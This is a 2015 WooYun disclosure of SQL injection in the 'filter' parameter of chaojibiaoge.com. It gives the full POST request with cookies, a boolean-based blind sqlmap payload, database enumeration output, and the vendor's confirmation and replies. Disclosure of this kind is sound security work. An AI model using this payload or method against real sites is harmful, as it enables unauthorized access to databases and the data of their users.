当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123801

漏洞标题:超级表格某处SQL注入(5库)

相关厂商:chaojibiaoge.com

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-07-01 10:58

修复时间:2015-08-15 11:56

公开时间:2015-08-15 11:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-01: 细节已通知厂商并且等待厂商处理中
2015-07-01: 厂商已经确认,细节仅向厂商公开
2015-07-11: 细节向核心白帽子及相关领域专家公开
2015-07-21: 细节向普通白帽子公开
2015-07-31: 细节向实习白帽子公开
2015-08-15: 细节向公众公开

简要描述:

天地本不仁 万物为刍狗
【HD】 以团队之名 以个人之荣耀 共建网络安全

详细说明:

POST数据包:

POST /index.php/System/Model/getData HTTP/1.1
Content-Length: 246
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.chaojibiaoge.com:80/
Cookie: PHPSESSID=788fn81p80gadt1ibk4cgnihv4; Hm_lvt_35a20a00be201fa9a257e423b6f54444=1435666732; Hm_lpvt_35a20a00be201fa9a257e423b6f54444=1435666732; mcss_loginuser=e; mcss_ckj=; mcss_lastloginuser=e; HMACCOUNT=63C9F5FB7860C17B; table_projectmodels_table_action_currentpage=46; undefined_pagerows=500; mainsheet_table_action_total=7; table_publicprojects_table_action_currentpage=50; uni_lastopendfile=14051214262148183225; mcss_multisubmitWebform=YES
Host: www.chaojibiaoge.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
filter=&getRecordCount=true&modelid=oa_project_public&orderby=1&page=1&pagerows=12&searchword=&sql=


参数 filter 可注入

0.png


1.png


漏洞证明:

sqlmap identified the following injection points with a total of 643 HTTP(s) req
uests:
---
Parameter: filter (POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: filter=(SELECT (CASE WHEN (8612=8612) THEN 8612 ELSE 8612*(SELECT 8
612 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&getRecordCount=true&modelid=oa
_project_public&orderby=1&page=1&pagerows=12&searchword=&sql=
---
[21:02:12] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22, PHP 5.3.18
back-end DBMS: MySQL 5.0
[21:02:12] [INFO] fetching database names
[21:02:12] [INFO] fetching number of databases
[21:02:12] [INFO] retrieved: 5
[21:02:13] [INFO] retrieving the length of query output
[21:02:13] [INFO] retrieved: 18
[21:02:34] [INFO] retrieved: information_schema
[21:02:34] [INFO] retrieving the length of query output
[21:02:34] [INFO] retrieved: 5
[21:02:41] [INFO] retrieved: mysql
[21:02:41] [INFO] retrieving the length of query output
[21:02:41] [INFO] retrieved: 18
[21:03:01] [INFO] retrieved: performance_schema
[21:03:01] [INFO] retrieving the length of query output
[21:03:01] [INFO] retrieved: 3
[21:03:06] [INFO] retrieved: uni
[21:03:06] [INFO] retrieving the length of query output
[21:03:06] [INFO] retrieved: 7
[21:03:16] [INFO] retrieved: unitest
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] uni
[*] unitest
[21:03:16] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.chaojibiaoge.com'
[*] shutting down at 21:03:16

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-07-01 11:54

厂商回复:

谢谢你发现的漏洞。我们昨天开始补漏洞了。
今天有个执行set pagerows=1的sql操作,是您发送的吗?

最新状态:

暂无

漏洞评价:

评论

  1. 2015-07-01 12:00 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁 万物为刍狗)

    @铀尼信息科技 我没有执行过 set pagerows=1的sql操作 只按照上面的注入点 sqlmap 了一下 还有一个注入点 也用sqlmap跑了下 但是应该没有什么 set pagerows=1 的操作

  2. 2015-07-01 15:13 | 铀尼信息科技(乌云厂商)

    @天地不仁 以万物为刍狗 能和我们私下交流下你进行了什么操作获得了后台的数据库吗?我们对这方面缺乏专业人才防护,现在做了部分修改但是仍然很不完善,登陆我们网站在help里联系下我们的在线客服。十分感谢。